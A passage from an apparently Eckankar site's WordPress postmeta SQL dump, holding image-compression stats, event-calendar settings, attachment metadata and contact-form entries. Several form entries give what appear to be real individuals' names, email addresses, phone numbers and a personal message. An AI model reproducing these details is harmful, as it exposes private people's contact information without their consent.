WP-Optimize'),(154087,266225,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:122307;s:12:\"smushed-size\";i:37737;s:15:\"savings-percent\";d:69.150000000000005684341886080801486968994140625;}'),(154088,266228,'original-file','2022/02/eck-books-hmpg-row-of-3-updraft-pre-smush-original.png'),(154089,266228,'smush-complete','1'),(154090,266228,'smush-info','The file was compressed from 96.93 KB to 30.47 KB saving 68.56 percent using WP-Optimize'),(154091,266228,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:99255;s:12:\"smushed-size\";i:31205;s:15:\"savings-percent\";d:68.56000000000000227373675443232059478759765625;}'),(154092,266229,'original-file','2022/02/esc-temple-hmpg-row-of-3-updraft-pre-smush-original.png'),(193871,269227,'_field_656','Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 400-530 pm - Florence-Hybrid'),(193870,269227,'_field_651','(719) 235-0686'),(154095,266229,'smush-complete','1'),(154096,266229,'smush-info','The file was compressed from 147.58 KB to 41.12 KB saving 72.14 percent using WP-Optimize'),(154097,266229,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:151126;s:12:\"smushed-size\";i:42110;s:15:\"savings-percent\";d:72.1400000000000005684341886080801486968994140625;}'),(154098,266230,'original-file','2022/02/hu-song-hmpg-row-of-3-updraft-pre-smush-original.png'),(154099,266230,'smush-complete','1'),(154100,266230,'smush-info','The file was compressed from 140.66 KB to 39.83 KB saving 71.68 percent using WP-Optimize'),(154101,266230,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:144031;s:12:\"smushed-size\";i:40788;s:15:\"savings-percent\";d:71.68000000000000682121026329696178436279296875;}'),(154102,266188,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(154103,266188,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1643753207'),(154104,266250,'protect_children',''),(154105,266250,'mec_color',''),(154106,266250,'mec_location_id','118'),(154107,266250,'mec_dont_show_map','0'),(154108,266250,'mec_organizer_id','1'),(154109,266250,'mec_read_more',''),(154110,266250,'mec_more_info',''),(154111,266250,'mec_more_info_title',''),(154112,266250,'mec_more_info_target','_self'),(154113,266250,'mec_cost',''),(154114,266250,'mec_currency','a:0:{}'),(154115,266250,'mec_additional_organizer_ids','a:0:{}'),(154116,266250,'mec_additional_location_ids','a:0:{}'),(154117,266250,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-02-15\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-02-15\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(154118,266250,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(154119,266250,'mec_certain_weekdays','a:0:{}'),(154120,266250,'mec_allday','0'),(154121,266250,'one_occurrence','0'),(154122,266250,'mec_hide_time','0'),(154123,266250,'mec_hide_end_time','0'),(154124,266250,'mec_comment',''),(154125,266250,'mec_timezone','global'),(154126,266250,'mec_countdown_method','global'),(154127,266250,'mec_public','1'),(154128,266250,'mec_start_date','2022-02-15'),(154129,266250,'mec_start_time_hour','7'),(154130,266250,'mec_start_time_minutes','0'),(154131,266250,'mec_start_time_ampm','PM'),(154132,266250,'mec_start_day_seconds','68400'),(154133,266250,'mec_end_date','2022-02-15'),(154134,266250,'mec_end_time_hour','8'),(154135,266250,'mec_end_time_minutes','0'),(154136,266250,'mec_end_time_ampm','PM'),(154137,266250,'mec_end_day_seconds','72000'),(154138,266250,'mec_repeat_status','0'),(154139,266250,'mec_repeat_type',''),(154140,266250,'mec_repeat_interval','1'),(154141,266250,'mec_repeat_end',''),(154142,266250,'mec_repeat_end_at_occurrences',''),(154143,266250,'mec_repeat_end_at_date',''),(154144,266250,'mec_advanced_days','a:0:{}'),(154145,266250,'mec_in_days',''),(154146,266250,'mec_not_in_days',''),(154147,266250,'mec_hourly_schedules','a:0:{}'),(154148,266250,'mec_booking','a:0:{}'),(154149,266250,'mec_tickets','a:0:{}'),(154150,266250,'mec_fees_global_inheritance','1'),(154151,266250,'mec_fees','a:0:{}'),(154152,266250,'mec_ticket_variations_global_inheritance','1'),(154153,266250,'mec_ticket_variations','a:0:{}'),(154154,266250,'mec_reg_fields_global_inheritance','1'),(154155,266250,'mec_reg_fields','a:0:{}'),(154156,266250,'mec_bfixed_fields','a:0:{}'),(154157,266250,'mec_op','a:0:{}'),(154158,266250,'mec_fields','a:0:{}'),(154159,266250,'mec_event_status','EventScheduled'),(154160,266250,'mec_moved_online_link',''),(154161,266250,'mec_cancelled_reason',''),(154162,266250,'mec_display_cancellation_reason_in_single_page',''),(154163,266250,'boldgrid_hide_page_title','0'),(154164,266250,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(154165,266250,'passster_activate_global_protection',NULL),(154166,266250,'passster_activate_protection',NULL),(154167,266250,'passster_protection_type','password'),(154169,266250,'_dp_original','266104'),(154170,266250,'_edit_lock','1643779938:15'),(154171,266250,'_edit_last','15'),(154172,266250,'_thumbnail_id','265840'),(159233,266537,'_field_531','testing'),(159234,266537,'_field_532','choll.03@comcast.net'),(159232,266537,'_field_530','Test'),(155472,266324,'_field_402','Jeffrey'),(154179,266261,'_field_224','Samantha '),(154180,266261,'_field_225','Wezton'),(154181,266261,'_field_226','samanthaweston57@gmail.com'),(154182,266261,'_field_227','CO'),(154183,266261,'_field_228','US'),(154184,266261,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(154185,266261,'_form_id','21'),(154186,266261,'_seq_num','143'),(154195,266263,'_field_97','Gwen'),(154196,266263,'_field_98','Sapphire'),(154197,266263,'_field_99','Songwriter999@gmail.com'),(154198,266263,'_field_100','(760) 219-8237'),(154199,266263,'_field_101','Other'),(154200,266263,'_field_104','RESA'),(154201,266263,'_field_105','Hi Gordan,\n\nI\'m the singer songwriter that I think Luisa had probably mentioned.\n\nI knew her from Toronto years ago and had sung at least one of the Eck services she had facilitated.\n\nI had sent her one of my songs called \n\"In The Master\'s Eyes\"\nI have a couple of others I can send you for consideration for your seminar at the Eck Temple. I don\'t know if you plan on having a Regional Seminar  this year in September or at any other time. But if you are planning one for this year what would the dates be\n\nPlease let me know and I will get you the other two songs as soon as possible.\nWhat email address would you  like me to send it to?\n\nWith love in the Light and Sound,\nGwen'),(154202,266263,'_form_id','10'),(154203,266263,'_seq_num','21'),(154424,265425,'_wp_old_date','2022-01-18'),(193843,269223,'_field_654','Kelly'),(161650,266676,'mec_additional_organizer_ids','a:0:{}'),(161649,266676,'mec_currency','a:0:{}'),(161648,266676,'mec_cost',''),(161647,266676,'mec_more_info_target','_self'),(161638,266675,'_seq_num','9'),(161637,266675,'_form_id','56'),(161636,266675,'_field_535','Thank you, but we will not be attending.'),(161635,266675,'_field_532','mlc1950612@aol.com'),(154437,266285,'_field_496','Testing Public'),(154438,266285,'_field_497','Test'),(154439,266285,'_field_498','(555) 555-5555'),(154440,266285,'_field_499','choll.03@comcast.net'),(154441,266285,'_field_500','123 Mystreet'),(154442,266285,'_field_501','Denver'),(154443,266285,'_field_502','CO'),(154444,266285,'_field_503','US'),(154445,266285,'_field_505','Testing the Public \'Add/Update Email or Mailing Address\' form.'),(154446,266285,'_form_id','53'),(154447,266285,'_seq_num','2'),(154458,247330,'_wp_old_date','2022-02-17'),(154460,247336,'_wp_old_date','2022-02-17'),(154462,265030,'_wp_old_date','2022-02-17'),(154464,264903,'_wp_old_date','2022-02-17'),(154466,264902,'_wp_old_date','2022-02-17'),(154468,264901,'_wp_old_date','2022-02-17'),(154474,247342,'_wp_old_date','2022-02-17'),(154476,261921,'_wp_old_date','2022-02-17'),(154478,247343,'_wp_old_date','2022-02-17'),(154480,247344,'_wp_old_date','2022-02-17'),(154484,247345,'_wp_old_date','2022-02-17'),(177218,267955,'mec_attention_time','1676197800:1676244600'),(154494,247332,'_wp_old_date','2022-02-17'),(154496,266281,'_wp_old_date','2022-02-17'),(179332,268202,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:564;s:6:\"height\";i:258;s:4:\"file\";s:25:\"2023/03/meetup-wide-2.png\";s:8:\"filesize\";i:214329;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"meetup-wide-2-300x137.png\";s:5:\"width\";i:300;s:6:\"height\";i:137;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:63916;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"meetup-wide-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36918;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"meetup-wide-2-300x258.png\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:105442;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"meetup-wide-2-474x258.png\";s:5:\"width\";i:474;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:164061;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"meetup-wide-2-391x258.png\";s:5:\"width\";i:391;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:136366;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"meetup-wide-2-300x258.png\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:105442;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154523,266292,'passster_protection_type','password'),(154524,266292,'passster_activate_protection',NULL),(154525,266292,'passster_activate_global_protection',NULL),(154526,266292,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(154527,266292,'mec_display_cancellation_reason_in_single_page',''),(154528,266292,'mec_cancelled_reason',''),(154529,266292,'mec_moved_online_link',''),(154530,266292,'mec_event_status','EventScheduled'),(154531,266292,'mec_fields','a:0:{}'),(154532,266292,'mec_bfixed_fields','a:0:{}'),(154533,266292,'mec_public','1'),(154534,266292,'mec_countdown_method','global'),(154535,266292,'mec_timezone','global'),(154536,266292,'one_occurrence','0'),(154537,266292,'mec_additional_location_ids','a:0:{}'),(154538,266292,'mec_additional_organizer_ids','a:0:{}'),(154539,266292,'mec_currency','a:0:{}'),(154540,266292,'mec_cost',''),(154541,266292,'mec_more_info_target','_self'),(154542,266292,'mec_more_info_title',''),(154543,266292,'mec_more_info',''),(154544,266292,'mec_read_more',''),(154545,266292,'mec_event_date_submit','20210422105713'),(154546,266292,'mec_op','a:0:{}'),(154547,266292,'mec_reg_fields','a:0:{}'),(154548,266292,'mec_reg_fields_global_inheritance','1'),(154549,266292,'mec_ticket_variations','a:0:{}'),(154550,266292,'mec_ticket_variations_global_inheritance','1'),(154551,266292,'mec_fees','a:0:{}'),(154552,266292,'mec_fees_global_inheritance','1'),(154553,266292,'mec_tickets','a:0:{}'),(154554,266292,'mec_booking','a:0:{}'),(154555,266292,'mec_hourly_schedules','a:0:{}'),(154556,266292,'mec_not_in_days',''),(154557,266292,'mec_in_days',''),(154558,266292,'mec_repeat_type',''),(154559,266292,'mec_repeat_interval','1'),(154560,266292,'mec_repeat_end',''),(154561,266292,'mec_repeat_end_at_occurrences',''),(154562,266292,'mec_repeat_end_at_date',''),(154563,266292,'mec_advanced_days','a:0:{}'),(154564,266292,'mec_allday','0'),(154565,266292,'mec_hide_time','0'),(154566,266292,'mec_hide_end_time','0'),(154567,266292,'mec_comment',''),(154568,266292,'mec_repeat_status','0'),(154569,266292,'mec_certain_weekdays','a:0:{}'),(154570,266292,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(154571,266292,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-06\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-06\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(154572,266292,'protect_children',''),(154573,266292,'mec_color',''),(154574,266292,'mec_location_id','118'),(154575,266292,'mec_dont_show_map','1'),(154576,266292,'mec_organizer_id','1'),(154577,266292,'mec_start_date','2022-03-06'),(154578,266292,'mec_start_time_hour','10'),(154579,266292,'mec_start_time_minutes','30'),(154580,266292,'mec_start_time_ampm','AM'),(154581,266292,'mec_start_day_seconds','37800'),(154582,266292,'mec_end_date','2022-03-06'),(154583,266292,'mec_end_time_hour','11'),(154584,266292,'mec_end_time_minutes','30'),(154585,266292,'mec_end_time_ampm','AM'),(154586,266292,'mec_end_day_seconds','41400'),(154587,266292,'_dp_original','265756'),(154588,266292,'_edit_lock','1645381174:15'),(154589,266292,'_edit_last','15'),(154590,266292,'_thumbnail_id','266202'),(154591,266293,'protect_children',''),(154592,266293,'mec_color',''),(154593,266293,'mec_location_id','122'),(154594,266293,'mec_dont_show_map','0'),(154595,266293,'mec_organizer_id','1'),(154596,266293,'mec_read_more',''),(154597,266293,'mec_more_info',''),(154598,266293,'mec_more_info_title',''),(154599,266293,'mec_more_info_target','_self'),(154600,266293,'mec_cost',''),(154601,266293,'mec_currency','a:0:{}'),(154602,266293,'mec_additional_organizer_ids','a:0:{}'),(154603,266293,'mec_additional_location_ids','a:0:{}'),(154604,266293,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-13\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-13\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(154605,266293,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(154606,266293,'mec_certain_weekdays','a:0:{}'),(154607,266293,'mec_allday','0'),(154608,266293,'one_occurrence','0'),(154609,266293,'mec_hide_time','0'),(154610,266293,'mec_hide_end_time','0'),(154611,266293,'mec_comment',''),(154612,266293,'mec_timezone','global'),(154613,266293,'mec_countdown_method','global'),(154614,266293,'mec_public','1'),(154615,266293,'mec_start_date','2022-03-13'),(154616,266293,'mec_start_time_hour','10'),(154617,266293,'mec_start_time_minutes','30'),(154618,266293,'mec_start_time_ampm','AM'),(154619,266293,'mec_start_day_seconds','37800'),(154620,266293,'mec_end_date','2022-03-13'),(154621,266293,'mec_end_time_hour','11'),(154622,266293,'mec_end_time_minutes','30'),(154623,266293,'mec_end_time_ampm','AM'),(154624,266293,'mec_end_day_seconds','41400'),(154625,266293,'mec_repeat_status','0'),(154626,266293,'mec_repeat_type',''),(154627,266293,'mec_repeat_interval','1'),(154628,266293,'mec_repeat_end',''),(154629,266293,'mec_repeat_end_at_occurrences',''),(154630,266293,'mec_repeat_end_at_date',''),(154631,266293,'mec_advanced_days','a:0:{}'),(154632,266293,'mec_in_days',''),(154633,266293,'mec_not_in_days',''),(154634,266293,'mec_hourly_schedules','a:0:{}'),(154635,266293,'mec_booking','a:0:{}'),(154636,266293,'mec_tickets','a:0:{}'),(154637,266293,'mec_fees_global_inheritance','1'),(154638,266293,'mec_fees','a:0:{}'),(154639,266293,'mec_ticket_variations_global_inheritance','1'),(154640,266293,'mec_ticket_variations','a:0:{}'),(154641,266293,'mec_reg_fields_global_inheritance','1'),(154642,266293,'mec_reg_fields','a:0:{}'),(154643,266293,'mec_bfixed_fields','a:0:{}'),(154644,266293,'mec_op','a:0:{}'),(154645,266293,'mec_fields','a:0:{}'),(154646,266293,'mec_event_status','EventScheduled'),(154647,266293,'mec_moved_online_link',''),(154648,266293,'mec_cancelled_reason',''),(154649,266293,'mec_display_cancellation_reason_in_single_page',''),(154650,266293,'boldgrid_hide_page_title','0'),(154651,266293,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(154652,266293,'passster_activate_global_protection',NULL),(154653,266293,'passster_activate_protection',NULL),(154654,266293,'passster_protection_type','password'),(154655,266293,'sg_popup_target_custom','a:1:{i:0;s:6:\"264857\";}'),(154656,266293,'sgpb_popup_events_custom','a:1:{i:264857;a:1:{i:0;s:5:\"click\";}}'),(154659,266293,'_dp_original','266168'),(154658,266293,'_wp_old_date','2022-01-18'),(154660,266293,'_edit_lock','1646096317:15'),(154661,266293,'_edit_last','15'),(154662,266294,'_wp_attached_file','2022/02/FlowerELSS.webp'),(154663,266294,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:23:\"2022/02/FlowerELSS.webp\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"FlowerELSS-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"FlowerELSS-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:23:\"FlowerELSS-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:23:\"FlowerELSS-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:23:\"FlowerELSS-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:23:\"FlowerELSS-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"FlowerELSS-450x250.webp\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154664,266293,'_thumbnail_id','266294'),(154665,266294,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/02/FlowerELSS.webp - cannot be optimized, it has an invalid file type'),(154666,266294,'smush-complete',''),(154784,266298,'mec_additional_organizer_ids','a:0:{}'),(154785,266298,'mec_additional_location_ids','a:0:{}'),(154786,266298,'one_occurrence','0'),(154787,266298,'mec_timezone','global'),(154788,266298,'mec_countdown_method','global'),(154789,266298,'mec_public','1'),(154790,266298,'mec_bfixed_fields','a:0:{}'),(154791,266298,'mec_fields','a:0:{}'),(154792,266298,'mec_event_status','EventScheduled'),(154793,266298,'mec_moved_online_link',''),(154794,266298,'mec_cancelled_reason',''),(154795,266298,'mec_display_cancellation_reason_in_single_page',''),(154796,266298,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(154797,266298,'passster_activate_global_protection',NULL),(154798,266298,'passster_activate_protection',NULL),(154799,266298,'passster_protection_type','password'),(154800,266298,'_wp_old_date','2022-01-18'),(154801,266298,'_dp_original','265425'),(154802,266298,'_edit_lock','1645749580:15'),(154803,266298,'_edit_last','15'),(154804,266299,'_wp_attached_file','2022/02/ExperienceHu2.webp'),(154805,266299,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:26:\"2022/02/ExperienceHu2.webp\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"ExperienceHu2-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"ExperienceHu2-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"ExperienceHu2-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"ExperienceHu2-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"ExperienceHu2-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"ExperienceHu2-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"ExperienceHu2-450x250.webp\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"c